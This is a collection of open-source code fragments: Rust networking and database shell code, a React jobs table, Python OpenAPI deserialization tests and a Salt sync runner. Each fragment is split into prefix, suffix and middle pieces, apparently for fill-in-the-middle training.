let addr = self.addr.parse(&self.socket).and_then(|a| {
a.remote().ok_or_else(|| {
io::Error::new(io::ErrorKind::Other, "could not obtain remote address")
})
})?;
Ok((s, addr))
}
}
impl<'a> EventSource for TcpListenerAccept<'a> {
fn subscribe(&mut self, co: CoroutineImpl) {
let _g = self.can_drop.delay_drop();
let s = get_scheduler();
let cancel = co_cancel_data(&co);
// we don't need to register the timeout here,
// prepare the co first
self.io_data.co = Some(co);
// call the overlapped read API
co_try!(s, self.io_data.co.take().expect("can't get co"), unsafe {
self.socket
.accept_overlapped(&*self.ret, &mut self.addr, self.io_data.get_overlapped())
});
// register the cancel io data
cancel.set_io(CancelIoData::new(&self.io_data));
// re-check the cancel status
if cancel.is_canceled() {
unsafe { cancel.cancel() };
}
}
} |
let local_addr = socket.local_addr()?;
let stream = match local_addr { |
mod.rs | //! A collection of codecs that can be used to transform between bytes streams /
//! byte messages, byte frames and structured events.
#![deny(missing_docs)]
mod decoder;
mod encoder; |
pub use decoder::{Decoder, DecodingConfig};
pub use encoder::Encoder;
pub use ready_frames::ReadyFrames; | mod ready_frames; |
no-link.rs | // Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// aux-build:empty-struct.rs
#[no_link]
extern crate empty_struct;
//~^ WARN proc macro crates and `#[no_link]` crates have no effect without `#[macro_use]`
fn main() | {
empty_struct::XEmpty1; //~ ERROR cannot find value `XEmpty1` in module `empty_struct`
} |
|
objstaticmethod.rs | use super::objtype::PyClassRef;
use crate::function::OptionalArg;
use crate::pyobject::{PyClassImpl, PyContext, PyObjectRef, PyRef, PyResult, PyValue};
use crate::slots::SlotDescriptor;
use crate::vm::VirtualMachine;
#[pyclass(name = "staticmethod")]
#[derive(Clone, Debug)]
pub struct PyStaticMethod {
pub callable: PyObjectRef,
}
pub type PyStaticMethodRef = PyRef<PyStaticMethod>;
impl PyValue for PyStaticMethod {
fn class(vm: &VirtualMachine) -> PyClassRef {
vm.ctx.staticmethod_type()
}
}
impl SlotDescriptor for PyStaticMethod {
fn descr_get(
vm: &VirtualMachine,
zelf: PyObjectRef,
_obj: Option<PyObjectRef>,
_cls: OptionalArg<PyObjectRef>,
) -> PyResult {
let zelf = Self::_zelf(zelf, vm)?;
Ok(zelf.callable.clone())
}
}
#[pyimpl(with(SlotDescriptor), flags(BASETYPE))]
impl PyStaticMethod {
pub fn | (callable: PyObjectRef) -> Self {
Self { callable }
}
#[pyslot]
fn tp_new(
cls: PyClassRef,
callable: PyObjectRef,
vm: &VirtualMachine,
) -> PyResult<PyStaticMethodRef> {
PyStaticMethod {
callable: callable.clone(),
}
.into_ref_with_type(vm, cls)
}
}
pub fn init(context: &PyContext) {
PyStaticMethod::extend_class(context, &context.types.staticmethod_type);
}
| new |
AllJobs.tsx | import React, {
ComponentPropsWithoutRef,
FunctionComponent,
useCallback,
useContext,
useEffect,
useMemo,
useState
} from 'react';
import Helmet from 'react-helmet';
import { useSnackbar } from 'notistack';
import useFetch from 'use-http-2';
import { reduce } from 'lodash';
import TeamsContext from '../../contexts/Teams';
import useActions from '../../hooks/useActions';
import useBatchActions from '../../hooks/useBatchActions';
import ClusterContext from './ClusterContext';
import JobsTable from './JobsTable';
import {
user,
status,
type,
gpu,
preemptible,
priority,
submitted,
finished,
useNameId,
} from './JobsTable/columns';
import { groupByActiveStatus } from './utils';
|
const ActiveJobsTable: FunctionComponent<JobsTablePropsWithoutColumnsActions> = (props) => {
const { cluster } = useContext(ClusterContext);
const { support, approve, pause, resume, kill } = useActions(cluster.id);
const { batchApprove, batchPause, batchResume, batchKill } = useBatchActions(cluster.id);
const nameId = useNameId();
const columns = useMemo(() => [
nameId,
user(),
status(),
type(),
gpu(),
preemptible(),
priority(),
submitted(),
], [nameId]);
const actions = useMemo(() => {
if (cluster.admin) {
return [
support, approve, pause, resume, kill,
batchApprove, batchPause, batchResume, batchKill
];
} else {
return [support];
}
}, [
cluster.admin,
support, approve, pause, resume, kill,
batchApprove, batchPause, batchResume, batchKill
]);
return (
<JobsTable
columns={columns}
actions={actions}
{...props}
/>
);
};
const InactiveJobsTable: FunctionComponent<JobsTablePropsWithoutColumnsActions> = (props) => {
const { cluster } = useContext(ClusterContext);
const { support } = useActions(cluster.id);
const nameId = useNameId();
const columns = useMemo(() => [
nameId,
user(),
status(),
type(),
gpu(),
preemptible(),
priority(),
finished(),
], [nameId]);
const actions = useMemo(() => [support], [support]);
return (
<JobsTable
columns={columns}
actions={actions}
{...props}
/>
);
};
const AllJobs: FunctionComponent = () => {
const { enqueueSnackbar, closeSnackbar } = useSnackbar();
const { cluster } = useContext(ClusterContext);
const { selectedTeam } = useContext(TeamsContext);
const [limit, setLimit] = useState(30);
const { data, loading, error, get, abort } = useFetch(
`/api/v2/clusters/${cluster.id}/teams/${selectedTeam}/jobs?user=all&limit=${limit}`,
undefined,
[cluster.id, selectedTeam, limit]
);
const { Inactive: inactiveJobs=[], ...activeStatusesJobs } = useMemo(() => {
if (data === undefined) return {};
return groupByActiveStatus(data);
}, [data]);
const handleLastPage = useCallback((pageSize: number) => {
abort();
setLimit((limit) => Math.ceil((limit + pageSize) / pageSize) * pageSize);
}, [abort, setLimit]);
const title = useMemo(() => {
if (data === undefined) return cluster.id;
const length = reduce(activeStatusesJobs, (length, jobs) => length + jobs.length, 0)
return `(${length}) ${cluster.id}`;
}, [data, activeStatusesJobs, cluster]);
useEffect(() => {
if (loading === false) {
const timeout = setTimeout(get, 3000);
return () => {
clearTimeout(timeout);
}
}
}, [loading, get]);
useEffect(() => {
if (error !== undefined) {
const key = enqueueSnackbar(`Failed to fetch jobs from cluster: ${cluster.id}`, {
variant: 'error',
persist: true
});
return () => {
if (key !== null) closeSnackbar(key);
}
}
}, [error, enqueueSnackbar, closeSnackbar, cluster.id]);
return (
<>
{ title && <Helmet title={title}/> }
{ [ 'Running', 'Pending', 'Unapproved', 'Paused' ].map(
status => activeStatusesJobs[status] && (
<ActiveJobsTable
key={status}
title={`${status} Jobs`}
jobs={activeStatusesJobs[status]}
defaultPageSize={5}
selection
/>
)
) }
<InactiveJobsTable
title="Inactive Jobs"
jobs={inactiveJobs}
isLoading={data === undefined}
defaultPageSize={10}
onLastPage={handleLastPage}
/>
</>
);
};
export default AllJobs; | type JobsTablePropsWithoutColumnsActions = Omit<ComponentPropsWithoutRef<typeof JobsTable>, 'columns' | 'actions'> |
test_deserialization.py | # coding: utf-8
# flake8: noqa
"""
Run the tests.
$ pip install nose (optional)
$ cd OpenAPIPetstore-python
$ nosetests -v
"""
from collections import namedtuple
import json
import os
import time
import unittest
import datetime
import six
import petstore_api
from petstore_api.exceptions import (
ApiTypeError,
ApiKeyError,
ApiValueError,
)
from petstore_api.model import (
enum_test,
pet,
animal,
dog,
parent_pet,
child_lizard,
category,
outer_enum,
outer_number,
string_boolean_map,
)
from petstore_api.model_utils import (
file_type,
int,
model_to_dict,
str,
)
from petstore_api.rest import RESTResponse
MockResponse = namedtuple('MockResponse', 'data')
class DeserializationTests(unittest.TestCase):
def setUp(self):
self.api_client = petstore_api.ApiClient()
self.deserialize = self.api_client.deserialize
def test_enum_test(self):
""" deserialize dict(str, Enum_Test) """
data = {
'enum_test': {
"enum_string": "UPPER",
"enum_string_required": "lower",
"enum_integer": 1,
"enum_number": 1.1,
"outerEnum": "placed"
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: (enum_test.EnumTest,)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(
isinstance(deserialized['enum_test'], enum_test.EnumTest))
value = (
outer_enum.OuterEnum.allowed_values[('value',)]["PLACED"])
outer_enum_val = outer_enum.OuterEnum(value)
sample_instance = enum_test.EnumTest(
enum_string="UPPER",
enum_string_required="lower",
enum_integer=1,
enum_number=1.1,
outer_enum=outer_enum_val
)
self.assertEqual(deserialized['enum_test'], sample_instance)
def test_deserialize_dict_str_pet(self):
""" deserialize dict(str, Pet) """
data = {
'pet': {
"id": 0,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: (pet.Pet,)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(isinstance(deserialized['pet'], pet.Pet))
def test_deserialize_dict_str_dog(self):
""" deserialize dict(str, Dog), use discriminator"""
data = {
'dog': {
"className": "Dog",
"color": "white",
"breed": "Jack Russel Terrier"
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: (animal.Animal,)},), True)
self.assertTrue(isinstance(deserialized, dict))
dog_inst = deserialized['dog']
self.assertTrue(isinstance(dog_inst, dog.Dog))
self.assertEqual(dog_inst.class_name, "Dog")
self.assertEqual(dog_inst.color, "white")
self.assertEqual(dog_inst.breed, "Jack Russel Terrier")
def test_deserialize_lizard(self):
""" deserialize ChildLizard, use discriminator"""
data = {
"pet_type": "ChildLizard",
"lovesRocks": True
}
response = MockResponse(data=json.dumps(data))
lizard = self.deserialize(response,
(parent_pet.ParentPet,), True)
self.assertTrue(isinstance(lizard, child_lizard.ChildLizard))
self.assertEqual(lizard.pet_type, "ChildLizard")
self.assertEqual(lizard.loves_rocks, True)
def test_deserialize_dict_str_int(self):
""" deserialize dict(str, int) """
data = {
'integer': 1
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, ({str: (int,)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(isinstance(deserialized['integer'], int))
def test_deserialize_str(self):
""" deserialize str """
data = "test str"
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (str,), True)
self.assertTrue(isinstance(deserialized, str))
def test_deserialize_date(self):
""" deserialize date """
data = "1997-07-16"
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (datetime.date,), True)
self.assertTrue(isinstance(deserialized, datetime.date))
def test_deserialize_datetime(self):
""" deserialize datetime """
data = "1997-07-16T19:20:30.45+01:00"
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (datetime.datetime,), True)
self.assertTrue(isinstance(deserialized, datetime.datetime))
def test_deserialize_pet(self):
|
def test_deserialize_list_of_pet(self):
""" deserialize list[Pet] """
data = [
{
"id": 0,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie0",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
},
{
"id": 1,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie1",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
}]
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
([pet.Pet],), True)
self.assertTrue(isinstance(deserialized, list))
self.assertTrue(isinstance(deserialized[0], pet.Pet))
self.assertEqual(deserialized[0].id, 0)
self.assertEqual(deserialized[1].id, 1)
self.assertEqual(deserialized[0].name, "doggie0")
self.assertEqual(deserialized[1].name, "doggie1")
def test_deserialize_nested_dict(self):
""" deserialize dict(str, dict(str, int)) """
data = {
"foo": {
"bar": 1
}
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response,
({str: ({str: (int,)},)},), True)
self.assertTrue(isinstance(deserialized, dict))
self.assertTrue(isinstance(deserialized["foo"], dict))
self.assertTrue(isinstance(deserialized["foo"]["bar"], int))
def test_deserialize_nested_list(self):
""" deserialize list[list[str]] """
data = [["foo"]]
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, ([[str]],), True)
self.assertTrue(isinstance(deserialized, list))
self.assertTrue(isinstance(deserialized[0], list))
self.assertTrue(isinstance(deserialized[0][0], str))
def test_deserialize_none(self):
""" deserialize None """
response = MockResponse(data=json.dumps(None))
error_msg = (
"Invalid type for variable 'received_data'. Required value type is "
"datetime and passed type was NoneType at ['received_data']"
)
with self.assertRaises(ApiTypeError) as exc:
deserialized = self.deserialize(response, (datetime.datetime,), True)
self.assertEqual(str(exc.exception), error_msg)
def test_deserialize_OuterEnum(self):
""" deserialize OuterEnum """
# make sure that an exception is thrown on an invalid value
with self.assertRaises(ApiValueError):
self.deserialize(
MockResponse(data=json.dumps("test str")),
(outer_enum.OuterEnum,),
True
)
# valid value works
placed_str = (
outer_enum.OuterEnum.allowed_values[('value',)]["PLACED"]
)
response = MockResponse(data=json.dumps(placed_str))
deserialized = self.deserialize(response,
(outer_enum.OuterEnum,), True)
self.assertTrue(isinstance(deserialized, outer_enum.OuterEnum))
self.assertTrue(deserialized.value == placed_str)
def test_deserialize_OuterNumber(self):
""" deserialize OuterNumber """
# make sure that an exception is thrown on an invalid type value
with self.assertRaises(ApiTypeError):
deserialized = self.deserialize(
MockResponse(data=json.dumps("test str")),
(outer_number.OuterNumber,),
True
)
# make sure that an exception is thrown on an invalid value
with self.assertRaises(ApiValueError):
deserialized = self.deserialize(
MockResponse(data=json.dumps(21.0)),
(outer_number.OuterNumber,),
True
)
# valid value works
number_val = 11.0
response = MockResponse(data=json.dumps(number_val))
number = self.deserialize(response,
(outer_number.OuterNumber,), True)
self.assertTrue(isinstance(number, outer_number.OuterNumber))
self.assertTrue(number.value == number_val)
def test_deserialize_file(self):
"""Ensures that file deserialization works"""
response_types_mixed = (file_type,)
# sample from http://www.jtricks.com/download-text
HTTPResponse = namedtuple(
'urllib3_response_HTTPResponse',
['status', 'reason', 'data', 'getheaders', 'getheader']
)
headers = {'Content-Disposition': 'attachment; filename=content.txt'}
def get_headers():
return headers
def get_header(name, default=None):
return headers.get(name, default)
file_data = (
"You are reading text file that was supposed to be downloaded\r\n"
"to your hard disk. If your browser offered to save you the file,"
"\r\nthen it handled the Content-Disposition header correctly."
)
http_response = HTTPResponse(
status=200,
reason='OK',
data=file_data,
getheaders=get_headers,
getheader=get_header
)
# response which is deserialized to a file
mock_response = RESTResponse(http_response)
file_path = None
try:
file_object = self.deserialize(
mock_response, response_types_mixed, True)
self.assertTrue(isinstance(file_object, file_type))
file_path = file_object.name
self.assertFalse(file_object.closed)
file_object.close()
if six.PY3:
file_data = file_data.encode('utf-8')
with open(file_path, 'rb') as other_file_object:
self.assertEqual(other_file_object.read(), file_data)
finally:
os.unlink(file_path)
def test_deserialize_binary_to_str(self):
"""Ensures that bytes deserialization works"""
response_types_mixed = (str,)
# sample from http://www.jtricks.com/download-text
HTTPResponse = namedtuple(
'urllib3_response_HTTPResponse',
['status', 'reason', 'data', 'getheaders', 'getheader']
)
headers = {}
def get_headers():
return headers
def get_header(name, default=None):
return headers.get(name, default)
data = "str"
http_response = HTTPResponse(
status=200,
reason='OK',
data=json.dumps(data).encode("utf-8") if six.PY3 else json.dumps(data),
getheaders=get_headers,
getheader=get_header
)
mock_response = RESTResponse(http_response)
result = self.deserialize(mock_response, response_types_mixed, True)
self.assertEqual(isinstance(result, str), True)
self.assertEqual(result, data)
def test_deserialize_string_boolean_map(self):
"""
Ensures that string boolean (additional properties)
deserialization works
"""
# make sure that an exception is thrown on an invalid type
with self.assertRaises(ApiTypeError):
deserialized = self.deserialize(
MockResponse(data=json.dumps("test str")),
(string_boolean_map.StringBooleanMap,),
True
)
# valid value works
item_val = {'some_key': True}
response = MockResponse(data=json.dumps(item_val))
model = string_boolean_map.StringBooleanMap(**item_val)
deserialized = self.deserialize(response,
(string_boolean_map.StringBooleanMap,), True)
self.assertTrue(isinstance(deserialized, string_boolean_map.StringBooleanMap))
self.assertTrue(deserialized['some_key'] == True)
self.assertTrue(deserialized == model)
| """ deserialize pet """
data = {
"id": 0,
"category": {
"id": 0,
"name": "string"
},
"name": "doggie",
"photoUrls": [
"string"
],
"tags": [
{
"id": 0,
"fullName": "string"
}
],
"status": "available"
}
response = MockResponse(data=json.dumps(data))
deserialized = self.deserialize(response, (pet.Pet,), True)
self.assertTrue(isinstance(deserialized, pet.Pet))
self.assertEqual(deserialized.id, 0)
self.assertEqual(deserialized.name, "doggie")
self.assertTrue(isinstance(deserialized.category, category.Category))
self.assertEqual(deserialized.category.name, "string")
self.assertTrue(isinstance(deserialized.tags, list))
self.assertEqual(deserialized.tags[0].full_name, "string") |
main.rs | // Copyright 2022 RisingLight Project Authors. Licensed under Apache-2.0.
//! A simple interactive shell of the database.
use std::fs::File;
use std::sync::Mutex;
use anyhow::{anyhow, Result};
use clap::Parser;
use risinglight::array::{datachunk_to_sqllogictest_string, DataChunk};
use risinglight::storage::SecondaryStorageOptions;
use risinglight::Database;
use rustyline::error::ReadlineError;
use rustyline::Editor;
use tracing::{info, warn, Level};
use tracing_subscriber::prelude::*;
/// RisingLight: an OLAP database system.
#[derive(Parser, Debug)]
#[clap(author, version, about, long_about = None)]
struct Args {
/// File to execute. Can be either a SQL `sql` file or sqllogictest `slt` file.
#[clap(short, long)]
file: Option<String>,
/// Whether to use in-memory engine
#[clap(long)]
memory: bool,
/// Control the output format
/// - `text`: plain text
/// - `human`: human readable format
#[clap(long)]
output_format: Option<String>,
}
// human-readable message
fn print_chunk(chunk: &DataChunk, output_format: &Option<String>) {
let output_format = output_format.as_ref().map(|x| x.as_str());
match output_format {
Some("human") | None => match chunk.header() {
Some(header) => match header[0].as_str() {
"$insert.row_counts" => {
println!("{} rows inserted", chunk.array_at(0).get_to_string(0))
}
"$delete.row_counts" => {
println!("{} rows deleted", chunk.array_at(0).get_to_string(0))
}
"$create" => println!("created"),
"$drop" => println!("dropped"),
"$explain" => println!("{}", chunk.array_at(0).get_to_string(0)),
_ => println!("{}", chunk),
},
None => println!("{}", chunk),
},
Some("text") => println!("{}", datachunk_to_sqllogictest_string(chunk)),
Some(format) => panic!("unsupported output format: {}", format),
}
}
/// Run RisingLight interactive mode
async fn interactive(db: Database, output_format: Option<String>) -> Result<()> {
let mut rl = Editor::<()>::new();
let history_path = dirs::cache_dir().map(|p| {
let cache_dir = p.join("risinglight");
std::fs::create_dir_all(cache_dir.as_path()).ok();
let history_path = cache_dir.join("history.txt");
if !history_path.as_path().exists() {
File::create(history_path.as_path()).ok();
}
history_path.into_boxed_path()
});
if let Some(ref history_path) = history_path {
if let Err(err) = rl.load_history(&history_path) {
println!("No previous history. {err}");
}
}
loop {
let readline = rl.readline("> ");
match readline {
Ok(line) => {
rl.add_history_entry(line.as_str());
let ret = db.run(&line).await;
match ret {
Ok(chunks) => {
for chunk in chunks {
print_chunk(&chunk, &output_format);
}
}
Err(err) => println!("{}", err),
}
}
Err(ReadlineError::Interrupted) => {
println!("Interrupted");
}
Err(ReadlineError::Eof) => {
println!("Exited");
break;
}
Err(err) => {
println!("Error: {:?}", err);
break;
}
}
}
if let Some(ref history_path) = history_path {
if let Err(err) = rl.save_history(&history_path) {
println!("Save history failed, {err}");
}
}
Ok(())
}
/// Run a SQL file in RisingLight
async fn | (db: Database, path: &str, output_format: Option<String>) -> Result<()> {
let lines = std::fs::read_to_string(path)?;
info!("{}", lines);
let chunks = db.run(&lines).await?;
for chunk in chunks {
print_chunk(&chunk, &output_format);
}
Ok(())
}
/// Wrapper for sqllogictest
struct DatabaseWrapper {
tx: tokio::sync::mpsc::Sender<String>,
rx: Mutex<tokio::sync::mpsc::Receiver<Result<Vec<DataChunk>, risinglight::Error>>>,
output_format: Option<String>,
}
impl sqllogictest::DB for DatabaseWrapper {
type Error = risinglight::Error;
fn run(&self, sql: &str) -> Result<String, Self::Error> {
info!("{}", sql);
self.tx.blocking_send(sql.to_string()).unwrap();
let chunks = self.rx.lock().unwrap().blocking_recv().unwrap()?;
for chunk in &chunks {
print_chunk(chunk, &self.output_format);
}
let output = chunks
.iter()
.map(datachunk_to_sqllogictest_string)
.collect();
Ok(output)
}
}
/// Run a sqllogictest file in RisingLight
async fn run_sqllogictest(db: Database, path: &str, output_format: Option<String>) -> Result<()> {
let (ttx, mut trx) = tokio::sync::mpsc::channel(1);
let (dtx, drx) = tokio::sync::mpsc::channel(1);
let mut tester = sqllogictest::Runner::new(DatabaseWrapper {
tx: ttx,
rx: Mutex::new(drx),
output_format,
});
let handle = tokio::spawn(async move {
while let Some(sql) = trx.recv().await {
dtx.send(db.run(&sql).await).await.unwrap();
}
});
let path = path.to_string();
let sqllogictest_handler = tokio::task::spawn_blocking(move || {
// `ParseError` isn't Send, so we cannot directly use it as anyhow Error.
tester.run_file(path).map_err(|err| anyhow!("{:?}", err))?;
Ok::<_, anyhow::Error>(())
});
sqllogictest_handler.await.unwrap().unwrap();
handle.await.unwrap();
Ok(())
}
#[tokio::main]
async fn main() -> Result<()> {
let args = Args::parse();
let fmt_layer = tracing_subscriber::fmt::layer().compact();
let filter_layer =
tracing_subscriber::EnvFilter::from_default_env().add_directive(Level::INFO.into());
tracing_subscriber::registry()
.with(filter_layer)
.with(fmt_layer)
.init();
let db = if args.memory {
info!("using memory engine");
Database::new_in_memory()
} else {
info!("using Secondary engine");
Database::new_on_disk(SecondaryStorageOptions::default_for_cli()).await
};
if let Some(file) = args.file {
if file.ends_with(".sql") {
run_sql(db, &file, args.output_format).await?;
} else if file.ends_with(".slt") {
run_sqllogictest(db, &file, args.output_format).await?;
} else {
warn!("No suffix detected, assume sql file");
run_sql(db, &file, args.output_format).await?;
}
} else {
interactive(db, args.output_format).await?;
}
Ok(())
}
| run_sql |
saltutil.py | # -*- coding: utf-8 -*-
'''
The Saltutil runner is used to sync custom types to the Master. See the
:mod:`saltutil module <salt.modules.saltutil>` for documentation on
managing updates to minions.
.. versionadded:: 2016.3.0
'''
from __future__ import absolute_import, print_function, unicode_literals
# Import python libs
import logging
# Import salt libs
import salt.utils.extmods
log = logging.getLogger(__name__) | '''
Sync all custom types
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
dictionary of modules to sync based on type
extmod_blacklist : None
dictionary of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_all
salt-run saltutil.sync_all extmod_whitelist={'runners': ['custom_runner'], 'grains': []}
'''
log.debug('Syncing all')
ret = {}
ret['clouds'] = sync_clouds(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['modules'] = sync_modules(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['states'] = sync_states(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['grains'] = sync_grains(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['renderers'] = sync_renderers(saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)
ret['returners'] = sync_returners(saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)
ret['output'] = sync_output(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['proxymodules'] = sync_proxymodules(saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)
ret['runners'] = sync_runners(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['wheel'] = sync_wheel(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['engines'] = sync_engines(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['thorium'] = sync_thorium(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['queues'] = sync_queues(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['pillar'] = sync_pillar(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['utils'] = sync_utils(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['sdb'] = sync_sdb(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['cache'] = sync_cache(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['fileserver'] = sync_fileserver(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['tops'] = sync_tops(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['tokens'] = sync_eauth_tokens(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['serializers'] = sync_serializers(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['auth'] = sync_auth(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
ret['executors'] = sync_executors(saltenv=saltenv, extmod_whitelist=extmod_whitelist, extmod_blacklist=extmod_blacklist)
return ret
def sync_auth(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync execution modules from ``salt://_auth`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_auth
'''
return salt.utils.extmods.sync(__opts__, 'auth', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_modules(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync execution modules from ``salt://_modules`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_modules
'''
return salt.utils.extmods.sync(__opts__, 'modules', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_states(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync state modules from ``salt://_states`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_states
'''
return salt.utils.extmods.sync(__opts__, 'states', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_grains(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync grains modules from ``salt://_grains`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_grains
'''
return salt.utils.extmods.sync(__opts__, 'grains', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_renderers(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync renderer modules from from ``salt://_renderers`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_renderers
'''
return salt.utils.extmods.sync(__opts__, 'renderers', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_returners(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync returner modules from ``salt://_returners`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_returners
'''
return salt.utils.extmods.sync(__opts__, 'returners', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_output(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync output modules from ``salt://_output`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_output
'''
return salt.utils.extmods.sync(__opts__, 'output', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_proxymodules(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync proxy modules from ``salt://_proxy`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_proxymodules
'''
return salt.utils.extmods.sync(__opts__, 'proxy', saltenv=saltenv, extmod_whitelist=extmod_whitelist,
extmod_blacklist=extmod_blacklist)[0]
def sync_runners(saltenv='base', extmod_whitelist=None, extmod_blacklist=None):
'''
Sync runners from ``salt://_runners`` to the master
saltenv : base
The fileserver environment from which to sync. To sync from more than
one environment, pass a comma-separated list.
extmod_whitelist : None
comma-separated list of modules to sync
extmod_blacklist : None
comma-separated list of modules to blacklist based on type
CLI Example:
.. code-block:: bash
salt-run saltutil.sync_runners
'''
